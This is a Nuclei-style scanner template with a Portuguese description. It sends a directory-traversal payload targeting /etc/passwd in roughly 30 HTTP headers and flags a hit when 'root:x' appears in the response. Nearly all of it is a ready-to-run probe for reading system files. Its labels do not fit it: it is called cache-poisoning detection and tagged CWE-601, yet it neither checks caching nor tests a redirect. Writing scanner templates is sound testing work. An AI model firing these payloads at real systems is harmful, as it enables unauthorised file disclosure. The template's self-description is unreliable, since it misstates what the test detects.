id: lfi_header_header2
info:
  name: Cache Poisoning Detection
  author: xandsz
  severity: medium
  description: |
    Detecta possíveis vulnerabilidades de Cache Poisoning explorando cabeçalhos manipulados que podem impactar a resposta do servidor, verificando se a resposta é armazenada em cache.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    max-request: 3
  tags: cache, poisoning, lfi, fuzzer

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
        Accept: ../../../../../../../../../../etc/passwd
        Referer: ../../../../../../../../../../etc/passwd
        Origin: ../../../../../../../../../../etc/passwd
        Authorization: ../../../../../../../../../../etc/passwd
        X-Forwarded: ../../../../../../../../../../etc/passwd
        X-Forwarded-By: ../../../../../../../../../../etc/passwd
        X-Forwarded-For: ../../../../../../../../../../etc/passwd
        Accept-Ranges: ../../../../../../../../../../etc/passwd
        Access-Token: ../../../../../../../../../../etc/passwd
        Action: ../../../../../../../../../../etc/passwd
        Admin: ../../../../../../../../../../etc/passwd
        Ajax: ../../../../../../../../../../etc/passwd
        Allow: ../../../../../../../../../../etc/passwd
        Auth: ../../../../../../../../../../etc/passwd
        Auth-Basic: ../../../../../../../../../../etc/passwd
        Cookie: ../../../../../../../../../../etc/passwd
        Connection: ../../../../../../../../../../etc/passwd
        Forwarded: ../../../../../../../../../../etc/passwd
        HTTP2-Settings: ../../../../../../../../../../etc/passwd
        X-Original-Url: ../../../../../../../../../../etc/passwd
        X-Original-User-Agent: ../../../../../../../../../../etc/passwd
        X-Originating-Ip: ../../../../../../../../../../etc/passwd
        TE: ../../../../../../../../../../etc/passwd
        Trailer: ../../../../../../../../../../etc/passwd
        Transfer-Encoding: ../../../../../../../../../../etc/passwd
        Via: ../../../../../../../../../../etc/passwd
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "root:x"
      - type: status
        status:
          - 200
          - 404
